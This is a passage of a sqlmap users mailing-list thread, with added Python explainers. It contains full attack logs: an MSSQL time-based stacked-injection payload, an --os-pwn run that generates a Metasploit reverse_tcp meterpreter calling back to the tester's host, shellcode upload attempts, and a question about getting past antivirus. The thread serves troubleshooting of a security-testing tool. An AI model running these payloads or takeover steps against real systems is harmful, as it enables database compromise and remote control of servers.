[11:13:12] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode' [11:13:12] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe [11:13:12] [INFO] retrieved: [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds [11:13:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path) do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] y [11:13:15] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait.. [11:13:15] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, please wait.. [11:13:16] [CRITICAL] page not found (404) [11:13:16] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 1 times [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF) [*] shutting down at 11:13:16 --end--- On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <mir...@gm... > wrote: > Hi. > > 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi. > That way you'll kill the possibility to get perfectly valid results with > other techniques > 2) In current state, you've got some "trashy" characters (because of > combination of laggy connection and stacked SQLi), like: "D:/Program > Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use > --fresh-queries in such situations (once per run where you expect resume of > trashy chars) to force sqlmap to try to retrieve the problematic value once > again. 
> > Bye
> >
> > On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> wrote:
> >> [...]
From: Miroslav S. <mir...@gm...> - 2015-07-01 22:26:39
Hi.

1) First of all, please don't restrain sqlmap to only use "stacked" SQLi. That way you'll kill the possibility to get perfectly valid results with other techniques.
2) In the current state, you've got some "trashy" characters (because of a combination of laggy connection and stacked SQLi), like: "D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use --fresh-queries in such situations (once per run where you expect resume of trashy chars) to force sqlmap to try to retrieve the problematic value once again.

Bye

On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> wrote:
> [...]
--
Miroslav Stampar
http://about.me/stamparm
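The two points above, as an added illustration that is not sqlmap's own code: a simplified model of time-based blind inference over a laggy link. One late response during a binary search turns the 'L' of a constructed "MSSQL10" into a wrong character, and because the retrieved value is cached in the session it is resumed unchanged on the next run until a fresh retrieval is forced, which is what --fresh-queries does. The oracle, the lag schedule, the session dictionary and the stand-in value are all constructed here; real sqlmap inference is more elaborate (it calibrates the delay threshold statistically, which is what the "larger statistical model" warning in the log refers to).

```python
"""Why a laggy link corrupts time-based blind retrieval, and why the corrupted
value sticks until --fresh-queries. Added illustration, not sqlmap's own code:
the oracle, the session cache and the lag schedule are constructed here."""

SLEEP = 5.0          # the WAITFOR DELAY '0:0:5' from the posted payload
THRESHOLD = SLEEP    # a response at least this slow is read as "condition true"


class TimeOracle:
    """Stand-in for the injectable endpoint.

    ask(pos, mid) models the vector shown in the log,
        ; IF(ASCII(SUBSTRING(<value>, pos, 1)) > mid) WAITFOR DELAY '0:0:5'--
    and returns the observed response time. lag_on holds (pos, step) pairs at
    which the simulated network adds one extra SLEEP of latency; the client
    cannot tell that apart from the DBMS really sleeping."""

    def __init__(self, secret, lag_on=()):
        self.secret = secret
        self.lag_on = set(lag_on)
        self.steps = {}  # queries issued so far, per character position

    def ask(self, pos, mid):
        step = self.steps.get(pos, 0)
        self.steps[pos] = step + 1
        dbms_delay = SLEEP if ord(self.secret[pos]) > mid else 0.0
        network_lag = SLEEP if (pos, step) in self.lag_on else 0.0
        return dbms_delay + network_lag


def infer_char(oracle, pos):
    """Binary-search one character over printable ASCII using only the
    slow/not-slow signal. One misread answer sends the search down the wrong
    half and the result is a plausible-looking but wrong character."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(pos, mid) >= THRESHOLD:  # looks like "char > mid"
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def retrieve(oracle, length, session, key, fresh=False):
    """Retrieve a value, resuming it from the session cache unless fresh=True
    (the resume behaviour that --fresh-queries switches off)."""
    if not fresh and key in session:
        return session[key]
    value = "".join(infer_char(oracle, i) for i in range(length))
    session[key] = value  # sqlmap persists retrieved values across runs the same way
    return value


def demo():
    secret = "MSSQL10"  # constructed stand-in for the real directory name
    session = {}
    laggy = TimeOracle(secret, lag_on=[(4, 0)])  # one lag spike while reading the 'L'
    first = retrieve(laggy, len(secret), session, "tmpdir")
    resumed = retrieve(TimeOracle(secret), len(secret), session, "tmpdir")
    fixed = retrieve(TimeOracle(secret), len(secret), session, "tmpdir", fresh=True)
    return first, resumed, fixed


if __name__ == "__main__":
    first, resumed, fixed = demo()
    print("first run over a laggy link:   ", first)
    print("next run, resumed from session:", resumed)
    print("next run with --fresh-queries: ", fixed)
```

The first run reads "MSSQP10" because the spurious delay is indistinguishable from a real one; the second run never asks the target again and simply resumes the bad value, which is why a path such as "MSSQ^10.MSSQLSERVER/MSSQLaLo Ā" survives from run to run. Only the fresh retrieval returns "MSSQL10". The same reasoning is why restricting the run to time-based stacked queries (--technique=S) is a bad default: any other available technique answers without relying on timing at all.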
From: Brandon P. <bpe...@gm...> - 2015-07-01 15:10:59
--file-write allows you to write a file, and has the ability to check whether the file was written by comparing the size of the remote file with that of the local file you have written, to ensure it was written ~correctly.

On Wed, Jul 1, 2015 at 10:02 AM, Peter Laboratra <myp...@gm...> wrote:
> [...]

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Peter L. <myp...@gm...> - 2015-07-01 15:02:12
Hi All,

Need help in uploading a non-malicious file on a vulnerable target.

In several cases I noted that shell upload or meterpreter fails due to an effective & active Anti-Virus installed on the vulnerable target, as it gets deleted due to its malicious nature (even after a certain level of msf encoding).

I also noted that in most of the cases the method of uploading using --sql-shell fails due to lack of stacked-query related issues.

In that case, is there a way to upload a file which is not malicious, if the objective is not to take control of the system and just requires uploading a file?
From: Peter L. <myp...@gm...> - 2015-07-01 14:55:28
Hi All,

In the first phase of our test we discovered the Target URL is vulnerable and we managed to retrieve lots of information such as --users, --dbs, some of the --tables and lots more. All this retrieval was very slow, probably due to the time-based vulnerability; however, we tried through all (BEUSTQ) and found the same state.

During an attempt a few days after our success we noticed some of the parameters are not working and we are receiving errors, for instance during a re-query for --users we received the error "[09:39:23] [CRITICAL] unable to retrieve the number of database users". During a re-query for -U sa --passwords we received "unable to retrieve the password hashes for the database users (probably because the session user has no read privileges over the relevant system database table)".

We moved to OS takeover; initially we got an error for xp_cmdshell, however we activated and confirmed it using SQLNinja and moved on to get --os-shell, executed some commands like "hostname" and "whoami" and successfully retrieved their output.

Now, after a few minutes, we noted that we are not getting any output for any command, with the message "No output".

We moved to --os-pwn + --msf-path, but again with no success on meterpreter or VNC. We received the error "HTTP error codes detected during run: 404 (Not Found) - 1 times".

I'm attaching the screen log, please help me with this if there is any scope available.
Thanks in advance.

-------screen logs start-------

root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf7 -v 2
    _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
|_ -| . |   |   | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|     |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:03:33

mytarget_login
[10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
[10:03:33] [DEBUG] not a valid WebScarab log data
[10:03:33] [DEBUG] cleaning up configuration parameters
test_msf7
mytarget_login
/opt/metasploit/apps/pro/msf3
[10:03:33] [INFO] setting file for logging HTTP traffic
[10:03:33] [DEBUG] setting the HTTP timeout
[10:03:33] [DEBUG] creating HTTP requests opener object
[10:03:33] [DEBUG] forcing back-end DBMS to user defined value
[10:03:33] [DEBUG] setting the takeover out-of-band functionality
[10:03:33] [DEBUG] provided Metasploit Framework path '/opt/metasploit/apps/pro/msf3' is valid
[10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
[10:03:33] [DEBUG] resolving hostname 'mytarget.com'
[10:03:33] [INFO] testing connection to the target URL
[10:03:48] [DEBUG] declared web page charset 'utf-8'
sqlmap got a 302 redirect to 'https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection reset by peer')
[10:03:56] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: testNumber (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; WAITFOR DELAY '0:0:5'--&testPassword=3243
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[10:03:56] [INFO] testing Microsoft SQL Server
[10:03:56] [INFO] confirming Microsoft SQL Server
[10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ as temporary files directory
[10:04:00] [INFO] testing if current user is DBA
[10:04:00] [DEBUG] creating a support table to write commands standard output to
[10:04:00] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[10:04:04] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
[10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:04:05] [ERROR] unable to retrieve xp_cmdshell output
[10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [192.168.1.8]
which local port number do you want to use? [61371]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[10:04:17] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=61371 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
[10:04:17] [INFO] creation in progress .................. done
[10:04:35] [DEBUG] the shellcode size is 308 bytes
[10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsebykt.exe'
[10:04:35] [DEBUG] going to upload the binary file with stacked query SQL injection technique
[10:04:35] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsebykt.exe'
[10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfidjf.txt, please wait..
[10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsbcbi.ps1
[10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsebykt.exe file, please wait..
[10:04:37] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
[10:04:37] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsebykt.exe
[10:04:37] [INFO] retrieved:
[10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:37] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] Y
[10:04:41] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsebykt.exe', please wait..
[10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfegab.txt, please wait..
[10:04:41] [CRITICAL] page not found (404)
[10:04:41] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

[*] shutting down at 10:04:41

root@kali:~#

-------screen logs end-------

Please help!!
From: Miroslav S. <mir...@gm...> - 2015-06-30 15:11:51
Hi.

If you are using only GET parameters to pass arguments to your web application then you could manually find all the different links on your web site containing parameters. Then you should pass those to sqlmap (e.g. by listing them line by line in a file and using option -m to pass such a file to sqlmap, or one by one by using option -u).

Also, you can let sqlmap do all the crawling stuff by using e.g.: --crawl 2 --forms.

In more advanced cases you should use a MiTM proxy (e.g. Burp) and pass the requests of interest (containing GET and/or POST parameters) by either option -r or option -l.

Bye

On Jun 30, 2015 12:07 PM, "Savita" <sav...@qs...> wrote:
> [...]
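The "list them line by line in a file and pass it with -m" approach above, as an added example that is not sqlmap's own crawler: given a few already-fetched pages, collect every in-scope link that carries a query string, keep one representative per endpoint and parameter-name set (so /products.aspx?id=1 and ?id=2 are not both tested), and write the result in the one-URL-per-line format -m reads. The host app.example.test and the two sample pages are constructed for the example.

```python
"""Turn crawled pages into a target list for `sqlmap -m targets.txt`.
Added illustration, not sqlmap's own crawler (--crawl); the sample pages and
host are constructed for the example."""
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit


class LinkCollector(HTMLParser):
    """Collect every <a href> on a page, resolved against the page URL."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(urljoin(self.page_url, href))


def parameterised_targets(pages, scope_host):
    """pages: {page_url: html}. Keep one representative URL per
    (path, sorted parameter names): the same endpoint does not need to be
    tested once per value of id=, and off-scope hosts and links without a
    query string are not injection candidates for -u/-m."""
    seen = {}
    for page_url, html in pages.items():
        collector = LinkCollector(page_url)
        collector.feed(html)
        for link in collector.links:
            parts = urlsplit(link)
            if parts.netloc != scope_host or not parts.query:
                continue
            names = tuple(sorted(k for k, _ in parse_qsl(parts.query, keep_blank_values=True)))
            seen.setdefault((parts.path, names), link.split("#", 1)[0])  # drop fragments
    return sorted(seen.values())


def write_targets(targets, path):
    """One URL per line, the format `sqlmap -m <file>` reads."""
    with open(path, "w") as fh:
        fh.write("\n".join(targets) + "\n")
    return path


# Constructed sample: two "crawled" pages of a hypothetical app.example.test
SAMPLE_PAGES = {
    "http://app.example.test/": """
        <a href="/products.aspx?id=1">one</a>
        <a href="/products.aspx?id=2">two</a>
        <a href="/search.aspx?q=test&amp;page=1#top">search</a>
        <a href="/about.aspx">about</a>
        <a href="http://cdn.example.test/logo.png?v=3">off-scope</a>
        <a href="mailto:sales@example.test">mail</a>
    """,
    "http://app.example.test/search.aspx?q=test&page=1": """
        <a href="?q=test&amp;page=2">next</a>
        <a href="/products.aspx?category=5&amp;id=7">by category</a>
    """,
}

if __name__ == "__main__":
    targets = parameterised_targets(SAMPLE_PAGES, "app.example.test")
    write_targets(targets, "targets.txt")
    print("\n".join(targets))
    print("\nnext: sqlmap -m targets.txt   (add --forms for POST forms, or use -r with a saved request)")
```

On the sample pages this yields three targets: products.aspx by id, products.aspx by category and id, and search.aspx. The second products.aspx entry is kept because a different parameter set is a different injection surface, while the ?id=2 and ?page=2 variants are dropped as duplicates. Links that only appear after a POST, or behind a session, are exactly the cases where the proxy-plus -r route in the reply is the better tool.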
From: Savita <sav...@qs...> - 2015-06-30 10:07:00
Hi All,

I am doing some security tests on a web application and I decided to test sqlmap for the first time. From the tutorial post I understood that we need to pass a target URL to sqlmap. But I am not getting how to get a vulnerable URL from our website. Do I need to traverse all the pages of the website to get a vulnerable URL? What all attributes need to be tested to say testing for SQL Injection is completed? Could you please help me to resolve this? I am looking forward to hearing from you.

Thank you,
Savita